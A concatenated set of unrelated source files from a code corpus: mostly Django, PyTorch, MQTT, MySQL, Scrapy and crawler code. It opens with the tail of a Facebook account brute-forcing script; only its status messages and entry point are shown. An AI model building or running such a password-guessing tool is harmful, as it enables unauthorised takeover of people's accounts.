print "\n[*] Starting attack at %s" % time.strftime("%X")
print "[*] Account for bruteforcing %s" % (username)
print "[*] Loaded :",len(words),"words"
print "[*] Bruteforcing, please wait..."
file.write(facebook)
file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
file.write("\n[*] Account for bruteforcing %s" % (username))
file.write("\n[*] Loaded : %d words" % int(len(words)))
file.write("\n[*] Bruteforcing, please wait...\n")
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
try:
releaser()
bruteforce(word)
except NameError:
helpme()
if __name__ == '__main__':
main()
| [
"noreply@github.com"
] | bugresearcher.noreply@github.com |
164f4ccbd1e5d977f9155e7c47cf8cebf91a3f3f | 9e92a66f1e2aa8b910673ea5839c406055114898 | /posts/migrations/0003_auto_20200520_1420.py | e2162ee27b27586871860c381626eedf490812ad | [] | no_license | alexlega/hw05_final | f9055cf7b6e7f00d9775d187d6499cbd8f80a2fc | 8557b7437e8ea5b240342ed1963ccfada2b87572 | refs/heads/master | 2023-06-03T23:24:45.287006 | 2021-06-13T09:48:58 | 2021-06-13T09:48:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 558 | py | # Generated by Django 2.2 on 2020-05-20 14:20
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated schema migration for the posts app.

    Adds human-readable ``verbose_name`` labels to ``Group.title`` and
    ``Post.text``; no column type or constraint changes.
    """

    dependencies = [
        ('posts', '0002_auto_20200518_1808'),
    ]

    operations = [
        migrations.AlterField(
            model_name='group',
            name='title',
            field=models.CharField(max_length=200, verbose_name='Group'),
        ),
        migrations.AlterField(
            model_name='post',
            name='text',
            field=models.TextField(verbose_name='Text'),
        ),
    ]
| [
"sorochinsky.alex@gmail.com"
] | sorochinsky.alex@gmail.com |
f476a782bb7c0fa3988eeb584d7ee79e3ad18377 | bb09de22997670f0f3c3c360fa20d6a5394b7aa0 | /tests/lambda_functions/build_test.py | a4a36f093d8703d3978fe432b6c0c83f22f96ae6 | [
"Apache-2.0"
] | permissive | securitywarrior/binaryalert | 4bda9de405f641eb7cdb48d83c42e5ddbd635032 | 548fbfb9fd913a74381ff58afed46a60f36b5312 | refs/heads/master | 2021-01-21T11:33:08.356220 | 2017-08-30T22:09:52 | 2017-08-30T22:09:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,840 | py | """Test lambda_functions/build.py."""
import os
import tempfile
import unittest
from unittest import mock
import zipfile
from lambda_functions import build
@mock.patch.object(build, 'print')
class BuildTest(unittest.TestCase):
    """Test top-level build command.

    ``build.print`` is patched at the class level, so every test method
    receives the mock as its ``mock_print`` argument and can assert on
    progress output without polluting stdout.
    """
    # pylint: disable=protected-access

    def setUp(self):
        """Find temp directory in which to build packages."""
        self.maxDiff = None  # pylint: disable=invalid-name
        self._tempdir = tempfile.gettempdir()

    def _verify_filenames(self, archive_path, expected_filenames):
        """Verify the set of filenames in the zip archive matches the expected list."""
        with zipfile.ZipFile(archive_path, 'r') as archive:
            filenames = set(zip_info.filename for zip_info in archive.filelist)
            self.assertEqual(expected_filenames, filenames)

    def test_build_analyzer(self, mock_print):
        """Verify that a valid zipfile is generated for analyzer Lambda function."""
        build._build_analyzer(self._tempdir)
        # The analyzer bundle must contain the yara native extension,
        # its egg-info, the compiled rules and the handler modules.
        self._verify_filenames(
            os.path.join(self._tempdir, build.ANALYZE_ZIPFILE + '.zip'),
            {
                'yara_python-3.6.3.egg-info/',
                '__init__.py',
                'analyzer_aws_lib.py',
                'binary_info.py',
                'compiled_yara_rules.bin',
                'file_hash.py',
                'libpython3.5m.so.1.0',
                'main.py',
                'yara.so',
                'yara_analyzer.py',
                'yara_python-3.6.3.egg-info/dependency_links.txt',
                'yara_python-3.6.3.egg-info/installed-files.txt',
                'yara_python-3.6.3.egg-info/not-zip-safe',
                'yara_python-3.6.3.egg-info/PKG-INFO',
                'yara_python-3.6.3.egg-info/SOURCES.txt',
                'yara_python-3.6.3.egg-info/top_level.txt'
            }
        )
        mock_print.assert_called_once()

    def test_build_batcher(self, mock_print):
        """Verify that a valid zipfile is generated for the batcher Lambda function."""
        build._build_batcher(self._tempdir)
        # The batcher is a single-module bundle.
        self._verify_filenames(
            os.path.join(self._tempdir, build.BATCH_ZIPFILE + '.zip'), {'main.py'}
        )
        mock_print.assert_called_once()

    def test_build_dispatcher(self, mock_print):
        """Verify that a valid zipfile is generated for the dispatcher Lambda function."""
        build._build_dispatcher(self._tempdir)
        # The dispatcher is a single-module bundle.
        self._verify_filenames(
            os.path.join(self._tempdir, build.DISPATCH_ZIPFILE + '.zip'), {'main.py'}
        )
        mock_print.assert_called_once()

    def test_build_all(self, mock_print):
        """Verify that the top-level build function executes without error."""
        build.build(self._tempdir)
        # One progress line per bundled function (analyzer/batcher/dispatcher).
        self.assertEqual(3, mock_print.call_count)
| [
"noreply@github.com"
] | securitywarrior.noreply@github.com |
5119426e1ed1aa1986eb3fece023820bdd09b97c | 9943e71076dc24be03b6d3576949476e2835156f | /mqtt_google.py | 77780c169f38a942d2ae66ea9fdfa82a3d4d87bd | [] | no_license | bransyah/Project_2 | d434bd1d57152f79ef0a21b8343f3560c47d829e | 9e263ac3a8149c76ff17a8bbe8049147b8e85401 | refs/heads/main | 2023-02-08T14:01:52.079511 | 2021-01-01T16:58:27 | 2021-01-01T16:58:27 | 322,575,997 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,400 | py | import datetime
import jwt
import ssl
import time
import paho.mqtt.client as mqtt
#Project ID of IoT Core
PROJECT_ID = "hsc2020-04"
# Location of server
REGION_ID = "asia-east1"
# ID of IoT registry
REGISTRY_ID = "fog"
# ID of the Gateway
GATEWAY_ID = "fog_rpi"
# ID of the Device
DEVICE_ID = "esp32_fog"
# Type of encryption being used
ENCRYPTION_ALGORITHM = "RS256"
# Private Key fike
#PRIVATE_KEY_FILE = "/Users/rahmad/Workspace/Hardware-Software-MQTT/rsa_private.pem"
PRIVATE_KEY_FILE = "/home/pi/rsa_private.pem"
# Certificate for Google SSL
#CA_CERTS = "/Users/rahmad/Workspace/Hardware-Software-MQTT/roots.pem"
CA_CERTS = "/home/pi/roots.pem"
# Lifetime of credentials to send message
JWT_EXPIRES_IN_MINUTES = 10
# Google IoT MQTT Broker
MQTT_BRIDGE_HOSTNAME = "mqtt.googleapis.com"
MQTT_BRIDGE_PORT = 8883
# Timeout to wait for connection
WAIT_CONNECTION_TIMEOUT = 5
# Connection status
connected = False
def create_jwt():
    """Create a JWT used as the MQTT password for Cloud IoT Core.

    The token is signed with the gateway's private key and expires
    after ``JWT_EXPIRES_IN_MINUTES``; the audience is the GCP project.
    """
    iat = datetime.datetime.utcnow()
    exp = iat + datetime.timedelta(minutes=JWT_EXPIRES_IN_MINUTES)
    print("iat", iat)
    print("exp", exp)
    token = {
        # The time the token was issued.
        'iat': iat,
        # Token expiration time.
        'exp': exp,
        # The audience field should always be set to the GCP project id.
        'aud': PROJECT_ID
    }
    print("token", token)
    # Read the private key file.
    # NOTE(review): the file handle is never closed; prefer `with open(...)`.
    pem_file = open(PRIVATE_KEY_FILE, 'r')
    private_key = pem_file.read()
    print(f"Creating JWT using '{ENCRYPTION_ALGORITHM}' from private key file '{PRIVATE_KEY_FILE}'.")
    # PyJWT >= 2 returns a str directly, so the old `.decode('ascii')`
    # call (kept commented out below) is no longer needed.
    #jwt_token = jwt.encode(token, private_key, algorithm=ENCRYPTION_ALGORITHM).decode('ascii')
    jwt_token = jwt.encode(token, private_key, algorithm=ENCRYPTION_ALGORITHM)
    print()
    print("JWT TOKEN")
    print(jwt_token)
    print()
    return jwt_token
def error_str(rc):
    """Render a Paho return code as '<code>: <human readable message>'."""
    description = mqtt.error_string(rc)
    return "{}: {}".format(rc, description)
def on_connect(unused_client, unused_userdata, unused_flags, rc):
    """Callback for when a device connects; marks the session as live."""
    #print('on_connect: ', mqtt.connack_string(rc))
    print(f"on_connect: {error_str(rc)} ({mqtt.connack_string(rc)})")
    print()
    # Signal wait_for_connection() that the broker acknowledged us.
    global connected
    connected = True
def on_disconnect(unused_client, unused_userdata, rc):
    """Paho callback for when a device disconnects; clears the live flag."""
    print(f"on_disconnect: {error_str(rc)}")
    print()
    # Signal wait_for_disconnection() that the session is gone.
    global connected
    connected = False
def on_publish(client, userdata, mid):
    """Paho callback when a message is sent to the broker."""
    report = (
        'on_publish',
        " userdata:" + str(userdata),
        " mid:" + str(mid),
        "",
    )
    for line in report:
        print(line)
def on_subscribe(client, userdata, mid, granted_qos):
    """Paho callback fired when a subscription is acknowledged."""
    # Single print emitting the same two lines the original produced.
    print("on_subscribe\n")
def on_unsubscribe(client, userdata, mid):
    """Paho callback fired when an unsubscribe is acknowledged."""
    # Single print emitting the same two lines the original produced.
    print("on_unsubscribe\n")
def on_message(client, userdata, message):
    """Callback when the device receives a message on a subscription."""
    decoded = message.payload.decode('utf-8')
    payload = str(decoded)
    summary = "Received message '%s' on topic '%s' with Qos %s" % (
        payload, message.topic, str(message.qos))
    print(summary)
    print()
def wait_for_connection(timeout):
    """Poll once per second until `connected` is set or `timeout` seconds pass.

    Raises RuntimeError if the broker never acknowledged the connection.
    """
    global connected
    waited = 0
    while waited < timeout and not connected:
        time.sleep(1)
        waited += 1
    if not connected:
        raise RuntimeError('Could not connect to MQTT bridge.')
def get_client():
    """Create, configure and connect a Paho MQTT client to Cloud IoT Core.

    Authenticates with a fresh JWT as the password (the username is
    ignored by Google), enables TLS 1.2, wires up all callbacks, starts
    the background network loop and blocks until the broker acknowledges
    the connection.
    """
    # create client Object
    client_id = f"projects/{PROJECT_ID}/locations/{REGION_ID}/registries/{REGISTRY_ID}/devices/{GATEWAY_ID}"
    client = mqtt.Client(client_id=client_id)
    # With Google Cloud IoT Core, the username field is ignored, and the
    # password field is used to transmit a JWT to authorize the device.
    client.username_pw_set(username='unused',
                           password=create_jwt())
    # Use SSL/TLS support
    client.tls_set(ca_certs=CA_CERTS, tls_version=ssl.PROTOCOL_TLSv1_2)
    # Register message callbacks. https://eclipse.org/paho/clients/python/docs/
    # describes additional callbacks that Paho supports. In this example, the
    # callbacks just print to standard out.
    client.on_connect = on_connect
    client.on_disconnect = on_disconnect
    client.on_publish = on_publish
    client.on_subscribe = on_subscribe
    client.on_unsubscribe = on_unsubscribe
    client.on_message = on_message
    # Connect to the Google MQTT broker.
    client.connect(MQTT_BRIDGE_HOSTNAME, MQTT_BRIDGE_PORT)
    client.loop_start()
    # Block until on_connect fires (or raise after the timeout).
    wait_for_connection(WAIT_CONNECTION_TIMEOUT)
    return client
def wait_for_disconnection(timeout):
    """Poll once per second until `connected` clears or `timeout` seconds pass.

    Raises RuntimeError if the broker never acknowledged the disconnect.
    """
    global connected
    waited = 0
    while waited < timeout and connected:
        time.sleep(1)
        waited += 1
    if connected:
        raise RuntimeError('Could not disconnect to MQTT bridge.')
def release_client(client):
    """Disconnect the device from the broker and stop the network loop."""
    client.disconnect()
    client.loop_stop()
    # Block until on_disconnect fires (or raise after the timeout).
    wait_for_disconnection(WAIT_CONNECTION_TIMEOUT)
def attach_device(client):
    """Notify broker a new device has been attached.

    Publishes to the device's ``/attach`` topic so the gateway may proxy
    traffic for it.  The empty ``authorization`` field presumably makes
    Cloud IoT Core fall back to the gateway's credentials — TODO confirm.
    """
    print()
    print("Attach Device")
    print("================================================")
    print()
    # Publish to the topic to attach device
    mqtt_topic = f"/devices/{DEVICE_ID}/attach"
    # Create payload
    payload = '{"authorization" : ""}'
    # Publish something
    print("Attaching")
    print(" Topic: " + mqtt_topic)
    print(" Payload: " + payload)
    print()
    # Publish "payload" to the MQTT topic. qos=1 means at least once
    # delivery. Cloud IoT Core also supports qos=0 for at most once
    # delivery.
    message = client.publish(mqtt_topic, payload, qos=1)
    message.wait_for_publish()
def detach_device(client):
    """Notify broker a device has been detached.

    Publishes an empty payload to the device's ``/detach`` topic,
    undoing a previous attach_device() call.
    """
    print()
    print("Detach Device")
    print("================================================")
    print()
    # Publish to the topic to detach device
    mqtt_topic = f"/devices/{DEVICE_ID}/detach"
    # Create payload
    payload = None
    # Publish something
    print("Publishing")
    print(" Topic: " + mqtt_topic)
    print(" Payload: " + str(payload))
    print()
    # Publish "payload" to the MQTT topic. qos=1 means at least once
    # delivery. Cloud IoT Core also supports qos=0 for at most once
    # delivery.
    message = client.publish(mqtt_topic, payload, qos=1)
    message.wait_for_publish()
def publish_events(client, payload):
    """Publish one telemetry event on the device's ``/events`` topic.

    Attaches the device to the gateway, publishes the payload with
    QoS 1, then detaches again.  NOTE(review): attaching/detaching
    around every single publish adds two round-trips per event; batch
    publishers may want to attach once up front.
    """
    print()
    print("Publish Events")
    print("================================================")
    print()
    # Attach device to gateway
    attach_device(client)
    # Publish to the events
    mqtt_topic = f"/devices/{DEVICE_ID}/events"
    # Publish something
    print("Publishing")
    print(" Topic: " + mqtt_topic)
    print(" Payload: " + payload)
    print()
    # Publish "payload" to the MQTT topic. qos=1 means at least once
    # delivery. Cloud IoT Core also supports qos=0 for at most once
    # delivery.
    message = client.publish(mqtt_topic, payload, qos=1)
    message.wait_for_publish()
    # Detach device from gateway
    detach_device(client)
def command():
    """Build the Cloud IoT commands wildcard topic for this device.

    The original ``def command:`` was a syntax error (missing
    parentheses) and the topic f-string was unterminated; both are
    fixed here.  Returns the topic so callers can subscribe to it.
    """
    mqtt_topic = f"/devices/{DEVICE_ID}/commands/#"
    print('hello')
    return mqtt_topic
| [
"noreply@github.com"
] | bransyah.noreply@github.com |
2638d5a94f13b1dd9710696b782e2a9917a36ecf | d3efc82dfa61fb82e47c82d52c838b38b076084c | /ETF/etf_mysql/QueryEtfcountDB.py | c87ce03178907dbea9a4db749e8d62ffbca25e77 | [] | no_license | nantongzyg/xtp_test | 58ce9f328f62a3ea5904e6ed907a169ef2df9258 | ca9ab5cee03d7a2f457a95fb0f4762013caa5f9f | refs/heads/master | 2022-11-30T08:57:45.345460 | 2020-07-30T01:43:30 | 2020-07-30T01:43:30 | 280,388,441 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 668 | py | #!/usr/bin/python
# -*- encoding: utf-8 -*-
import MySQLdb
import time
import sys
sys.path.append("/home/yhl2/workspace/xtp_test/mysql")
from mysql_config import *
def QueryEtfcountDB(ticker):
    """Return the summed component_share for an ETF ticker from today's tables.

    Joins today's ``xtp_etf_components_YYYYMMDD`` and
    ``xtp_etf_baseinfo_YYYYMMDD`` tables, keeping only rows with
    substitute_flag in (0, 1).  Returns 0 when no rows match.
    """
    date = time.strftime('%Y%m%d', time.localtime(time.time()))
    # Table names are derived from today's date, not user input.  The ticker
    # is passed as a bound parameter instead of being concatenated into the
    # SQL text (the original was open to SQL injection and also shadowed the
    # builtin ``str``).
    sql = ('SELECT sum(component_share) from xtp_etf_components_' + date +
           ' a join xtp_etf_baseinfo_' + date +
           ' b on a.etf_code1 = b.etf_code1 where b.ticker=%s'
           ' and a.substitute_flag in (0,1);')
    conn = connectMysql()
    try:
        cur = conn.cursor()
        try:
            cur.execute(sql, (ticker,))
            rs = cur.fetchone()
        finally:
            # Release the cursor even when the query fails (the original
            # leaked both handles on any exception).
            cur.close()
    finally:
        conn.close()
    return float(rs[0]) if rs and rs[0] else 0
| [
"418033945@qq.com"
] | 418033945@qq.com |
89ff34b007ce902cc181bb8558322d1b36c921a2 | 42419e1bba2c6915fb3f9b89d64e27994d9763c5 | /src/network.py | d6a0066875f85f1d28301b0bb5be6eb677c60adc | [
"MIT"
] | permissive | xiamenwcy/Counting-ICCV-DSSINet | 904cae03ea99625e31c70c78a46c83e51fc8077d | 2582e5f6e117e63ef743c09318e70eae13bcc395 | refs/heads/master | 2022-02-22T17:08:41.058817 | 2019-10-29T15:29:15 | 2019-10-29T15:29:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,824 | py | from __future__ import print_function
import torch
import torch.nn as nn
from torch.autograd import Variable, Function
from torch.nn.modules.conv import _ConvNd
from torch.nn.modules.utils import _pair
from torch.nn import functional as F
from utils import compute_same_padding2d
import logging
from math import exp
import numpy as np
from collections import OrderedDict, namedtuple
from torch.nn import init
class GradReverse(Function):
    """Gradient-reversal layer (legacy torch.autograd.Function API).

    Forward is the identity; backward multiplies the incoming gradient by
    ``-lambd``, and zeroes it entirely when it contains NaNs.
    """

    def __init__(self, lambd):
        # Scale factor applied (negated) to the gradient on the way back.
        self.lambd = lambd

    def forward(self, x):
        # Identity; view_as keeps the result tied to the input's shape.
        return x.view_as(x)

    def backward(self, grad_output):
        # Drop a NaN-contaminated gradient rather than propagating it.
        if torch.isnan(grad_output).any():
            return grad_output.zero_()
        return grad_output * -self.lambd
def grad_reverse(x, lambd):
    """Apply gradient reversal with scale ``lambd`` to tensor ``x``."""
    reverser = GradReverse(lambd)
    return reverser(x)
class Conv2d(nn.Module):
    """Conv2d followed by optional BatchNorm and an optional non-linearity.

    ``NL`` selects the activation ('relu', 'prelu', 'tanh', 'sigmoid' or
    'lrelu'; anything else disables it).  With ``same_padding`` the layer
    pads so a stride-1 convolution preserves the spatial size.
    """

    def __init__(self, in_channels, out_channels, kernel_size, stride=1, groups=1, dilation=1, NL='relu', same_padding=True, bn=False, bias=True):
        super(Conv2d, self).__init__()
        pad = (kernel_size - 1) // 2 if same_padding else 0
        self.conv = nn.Conv2d(in_channels, out_channels, kernel_size, stride,
                              groups=groups, dilation=dilation, padding=pad, bias=bias)
        self.bn = nn.BatchNorm2d(out_channels, eps=0.001, momentum=0, affine=True) if bn else None
        builders = {
            'relu': lambda: nn.ReLU(inplace=True),
            'prelu': nn.PReLU,
            'tanh': nn.Tanh,
            'sigmoid': nn.Sigmoid,
            'lrelu': lambda: nn.LeakyReLU(inplace=True),
        }
        make = builders.get(NL)
        self.relu = make() if make is not None else None

    def forward(self, x):
        out = self.conv(x)
        if self.bn is not None:
            out = self.bn(out)
        if self.relu is not None:
            out = self.relu(out)
        return out
class Conv2d_dilated(nn.Module):
    """_Conv2d_dilated wrapper with optional BatchNorm and activation.

    Unlike ``Conv2d``, the dilation rate may be overridden per forward call.
    ``same_padding`` is accepted for signature compatibility only: padding is
    computed dynamically inside ``_Conv2d_dilated``.
    """

    def __init__(self, in_channels, out_channels, kernel_size, stride=1, NL='relu', same_padding=False, dilation=1, bn=False, bias=True, groups=1):
        super(Conv2d_dilated, self).__init__()
        self.conv = _Conv2d_dilated(in_channels, out_channels, kernel_size, stride,
                                    dilation=dilation, groups=groups, bias=bias)
        self.bn = nn.BatchNorm2d(out_channels, eps=0.001, momentum=0, affine=True) if bn else None
        builders = {
            'relu': lambda: nn.ReLU(inplace=True),
            'prelu': nn.PReLU,
            'tanh': nn.Tanh,
            'lrelu': lambda: nn.LeakyReLU(inplace=True),
            'sigmoid': nn.Sigmoid,
        }
        make = builders.get(NL)
        self.relu = make() if make is not None else None

    def forward(self, x, dilation=None):
        # ``dilation`` (if given) overrides the rate chosen at build time.
        out = self.conv(x, dilation)
        if self.bn is not None:
            out = self.bn(out)
        if self.relu is not None:
            out = self.relu(out)
        return out
class _Conv2d_dilated(_ConvNd):
    """Dilated 2-D convolution with dynamically computed 'SAME'-style padding.

    Padding is not fixed at construction: every forward pass recomputes it
    from the actual input shape (and an optional per-call dilation override)
    via ``compute_same_padding2d``, so variable-sized inputs are supported.
    """
    def __init__(self, in_channels, out_channels, kernel_size, stride=1, dilation=1, groups=1, bias=True):
        kernel_size = _pair(kernel_size)
        stride = _pair(stride)
        dilation = _pair(dilation)
        # padding=0 here because padding is applied manually in forward().
        # NOTE(review): the positional args (..., transposed=False,
        # output_padding=0, ...) match the old private _ConvNd signature;
        # newer torch versions add a trailing padding_mode -- confirm the
        # installed torch version before reuse.
        super(_Conv2d_dilated, self).__init__(
            in_channels, out_channels, kernel_size, stride, _pair(0), dilation,
            False, _pair(0), groups, bias)
    def forward(self, input, dilation=None):
        input_shape = list(input.size())
        # Per-call dilation override falls back to the constructed rate.
        dilation_rate = self.dilation if dilation is None else _pair(dilation)
        # padding: total pad per axis; pad_input: presumably 0/1 flags for an
        # extra right/bottom pixel when the total is odd -- TODO confirm
        # against utils.compute_same_padding2d.
        padding, pad_input = compute_same_padding2d(input_shape, kernel_size=self.kernel_size, strides=self.stride, dilation=dilation_rate)
        if pad_input[0] == 1 or pad_input[1] == 1:
            input = F.pad(input, [0, int(pad_input[0]), 0, int(pad_input[1])])
        return F.conv2d(input, self.weight, self.bias, self.stride,
                        (padding[0] // 2, padding[1] // 2), dilation_rate, self.groups)
#https://github.com/pytorch/pytorch/issues/3867
class FC(nn.Module):
    """Fully connected layer with an optional ReLU/PReLU non-linearity."""

    def __init__(self, in_features, out_features, NL='relu'):
        super(FC, self).__init__()
        self.fc = nn.Linear(in_features, out_features)
        builders = {'relu': lambda: nn.ReLU(inplace=True), 'prelu': nn.PReLU}
        make = builders.get(NL)
        self.relu = make() if make is not None else None

    def forward(self, x):
        out = self.fc(x)
        return out if self.relu is None else self.relu(out)
class SequentialEndpoints(nn.Module):
    """Sequential container that can also expose intermediate activations.

    ``layers`` must be an OrderedDict of name -> module.  ``endpoints``
    optionally maps layer names to endpoint field names so selected
    intermediate outputs can be returned alongside the final output.

    NOTE(review): the endpoints machinery looks broken on modern Python:
    ``namedtuple(..., verbose=True)`` was removed in Python 3.7, the
    namedtuple is instantiated with a single list argument, and ``setattr``
    on a namedtuple instance raises AttributeError.  Only the plain
    sequential path (endpoints=None, require_endpoints=False) is safe.
    """
    def __init__(self, layers, endpoints=None):
        super(SequentialEndpoints, self).__init__()
        assert isinstance(layers, OrderedDict)
        for key, module in layers.items():
            self.add_module(key, module)
        if endpoints is not None:
            self.Endpoints = namedtuple('Endpoints', endpoints.values(), verbose=True)
            self.endpoints = endpoints
    def __getitem__(self, idx):
        # List-style integer indexing with negative-index support.
        if not (-len(self) <= idx < len(self)):
            raise IndexError('index {} is out of range'.format(idx))
        if idx < 0:
            idx += len(self)
        it = iter(self._modules.values())
        for i in range(idx):
            next(it)
        return next(it)
    def __len__(self):
        return len(self._modules)
    def sub_forward(self, startpoint, endpoint):
        """Return a closure that runs only layers startpoint..endpoint (inclusive)."""
        def forward(input):
            flag = False
            for key, module in self._modules.items():
                if startpoint == endpoint:
                    # Single-layer slice: run just that one module.
                    output = input
                    if key == startpoint:
                        output = module(output)
                        return output
                elif flag or key == startpoint:
                    if key == startpoint:
                        output = input
                    flag = True
                    output = module(output)
                    if key == endpoint:
                        return output
            return output
        return forward
    def forward(self, input, require_endpoints=False):
        if require_endpoints:
            # NOTE(review): see class docstring -- this path likely fails at runtime.
            endpoints = self.Endpoints([None] * len(self.endpoints.keys()))
        for key, module in self._modules.items():
            input = module(input)
            if require_endpoints and key in self.endpoints.keys():
                setattr(endpoints, self.endpoints[key], input)
        if require_endpoints:
            return input, endpoints
        else:
            return input
def save_net(fname, net):
    """Serialize a network's state_dict into an HDF5 file at ``fname``."""
    if isinstance(net, torch.nn.DataParallel):
        # Unwrap DataParallel so keys have no 'module.' prefix.
        net = net.module
    import h5py
    with h5py.File(fname, mode='w') as h5f:
        for key, tensor in net.state_dict().items():
            # mode='w' truncates the file, but guard against duplicates anyway.
            if key in h5f.keys():
                del h5f[key]
            h5f.create_dataset(key, data=tensor.cpu().numpy())
def load_net(fname, net, skip=False, prefix=''):
    """Load parameters from an HDF5 checkpoint into ``net`` in place.

    With ``skip=True``, 'relu' entries are zeroed and 'loss' entries are
    ignored.  ``prefix`` is prepended to every state_dict key when looking
    it up in the file.
    """
    if isinstance(net, torch.nn.DataParallel):
        net = net.module
    import h5py
    with h5py.File(fname, mode='r') as h5f:
        for key, tensor in net.state_dict().items():
            if skip:
                if 'relu' in key:
                    tensor.copy_(torch.from_numpy(np.zeros((1,))))
                    continue
                if 'loss' in key:
                    continue
            full_key = prefix + key
            assert full_key in h5f.keys(), "key: {} size: {}".format(key, tensor.size())
            param = torch.from_numpy(np.asarray(h5f[full_key]))
            assert tensor.size() == param.size(), "{}: h5~{}-need~{}".format(key, param.size(), tensor.size())
            tensor.copy_(param)
def diff_net(fname, net):
    """Print the mean difference between ``net`` and an HDF5 checkpoint."""
    import h5py
    with h5py.File(fname, mode='r') as h5f:
        for key, tensor in net.state_dict().items():
            assert key in h5f.keys(), "key: {} size: {}".format(key, tensor.size())
            param = torch.from_numpy(np.asarray(h5f[key]))
            assert tensor.size() == param.size(), "{}: h5~{}-need~{}".format(key, param.size(), tensor.size())
            # Note: moves the checkpoint tensor to GPU to match the model.
            print("{}: {}".format(key, torch.mean(tensor - param.cuda())))
def np_to_variable(x, is_cuda=True, is_training=False, dtype=torch.FloatTensor):
    """Wrap a numpy array in a torch Variable of the given dtype.

    Inference-mode tensors are created without gradient tracking; on
    torch 0.3.x the legacy ``volatile`` flag is used instead of no_grad.
    """
    tensor = torch.from_numpy(x).type(dtype)
    if is_training:
        v = Variable(tensor)
    elif '0.3.1' not in torch.__version__ and '0.3.0' not in torch.__version__:
        with torch.no_grad():
            v = Variable(tensor, requires_grad=False)
    else:
        # torch 0.3.x path: volatile marks the whole graph as inference-only.
        v = Variable(tensor, requires_grad=False, volatile=True)
    if is_cuda:
        v = v.cuda()
    return v
def set_trainable(model, requires_grad):
    """Freeze (False) or unfreeze (True) every parameter of ``model``."""
    for parameter in model.parameters():
        parameter.requires_grad = requires_grad
def weights_normal_init(model, dev=0.01):
    """Initialize weights with N(0, dev) and zero biases, recursively.

    Accepts a single module or a list of modules.  BatchNorm2d weights use a
    different scale, N(1.0, 0.02).

    NOTE(review): ``init.normal`` / ``init.constant`` were renamed to
    ``init.normal_`` / ``init.constant_`` in torch >= 0.4; this code targets
    the older API (consistent with the 0.3.x version checks elsewhere in
    this file).
    """
    if isinstance(model, list):
        # Recurse into each module of the list.
        for m in model:
            weights_normal_init(m, dev)
    else:
        for m in model.modules():
            if isinstance(m, nn.Conv2d):
                m.weight.data.normal_(0.0, dev)
                if m.bias is not None:
                    m.bias.data.fill_(0.0)
            elif isinstance(m, nn.LSTM):
                # LSTM parameters come grouped per layer/direction.
                for weight_set in m._all_weights:
                    for param in weight_set:
                        if 'weight' in param:
                            m.__getattr__(param).data.normal_(0.0, dev)
                        if 'bias' in param:
                            m.__getattr__(param).data.fill_(0.0)
            elif isinstance(m, _Conv2d_dilated):
                m.weight.data.copy_(m.weight.data.normal_(0.0, dev))
                if m.bias is not None:
                    m.bias.data.fill_(0.0)
            elif isinstance(m, nn.Linear):
                m.weight.data.normal_(0.0, dev)
            elif isinstance(m, nn.BatchNorm2d):
                init.normal(m.weight.data, 1.0, 0.02)
init.constant(m.bias.data, 0.0) | [
"gek_u@foxmail.com"
] | gek_u@foxmail.com |
cbfb4ec1efcc22c8bed49f3d5112e308cf9f64db | 83ee7862590cf47efb0f38b39d1a0c4bf4d5a2f8 | /dl_tools/common/exception.py | c34149051c03636cc30b93dd8924343441ad947e | [] | no_license | lygztq/deep-learning-tools | f92523b4b67e842d7cd66681fa9151f8c088ebe3 | 7b8c3be8e2728a7066ffabce9adc33f8a95bb510 | refs/heads/master | 2020-08-28T08:29:01.977429 | 2019-10-26T03:39:29 | 2019-10-26T03:39:29 | 217,649,677 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 38 | py | class EmptyAttribute(object):
pass | [
"lygztq@gmail.com"
] | lygztq@gmail.com |
8f6969872bdcbfe8e05ab30d2c37160924a1798e | 14c3de56e43e6ee2fd281c3c30c6a899c88a5636 | /lesson_5/jobparser/items.py | 490fc9a1eb156954514a96079ce667f97f22a76f | [] | no_license | Hadirback/python_data_parsing_course | 8b17ad4d62e4bd86c3ec270682b6350b5a9bcce8 | 46ee6f9fb7b9ea54cf7bfeecfe8da0dd2072d61a | refs/heads/master | 2022-10-17T07:15:06.641823 | 2020-06-08T20:24:27 | 2020-06-08T20:24:27 | 263,717,412 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 380 | py | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/items.html
import scrapy
class JobparserItem(scrapy.Item):
    """Scraped vacancy: job title plus raw and parsed salary bounds."""
    name = scrapy.Field()
    salary = scrapy.Field()
    salary_min = scrapy.Field()
    salary_max = scrapy.Field()
| [
"mail.evgeny.filippov@gmail.com"
] | mail.evgeny.filippov@gmail.com |
011abdf7e55854aad8d948f584ab8fcc499a4084 | 3618700bbeb5dd36b01ab3a39fe36e1a09de3d1e | /crawler/Trst1.py | 0cb7a556d4ab42c0a91b4d11a01ff151e915f88b | [] | no_license | Guaijs/Sql_injection_detection | d2c6d4ca0a45781ab86b0b55cbf0191ae38d6173 | 6d00a1859f9dd549c700e0768d19db93cf480065 | refs/heads/master | 2022-06-02T10:38:08.629298 | 2020-05-05T14:32:38 | 2020-05-05T14:32:38 | 250,199,151 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,322 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Sep 29 14:01:28 2018
@author: ESionJL数据猫
question:1.当前url若爬取到的pagelinks为[],则将其移除visited列表。
2.spiderpage()函数中,当前url爬取到的网页为UNknown,会报错,如何规避,并将此url移除。
3.返回title为空
4.网站不可加载
5.过期网站,垃圾网站
"""
import re
import requests
from bs4 import BeautifulSoup
from urllib import request
from urllib import error
# 此测试首页是否可以链接
def url_get(num_retries=5):
    """Check that the crawl entry page is reachable and return its url.

    Retries up to ``num_retries`` times on 5xx errors; prints a notice and
    returns None when the site cannot be reached.
    """
    # url = input("请输入要爬取的首页url:")
    url = "https://www.newchinalife.com/"
    try:
        # Browser-like User-Agent header; other fields could be added too.
        kv = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko'}
        requests.get(url, headers=kv)
        return url
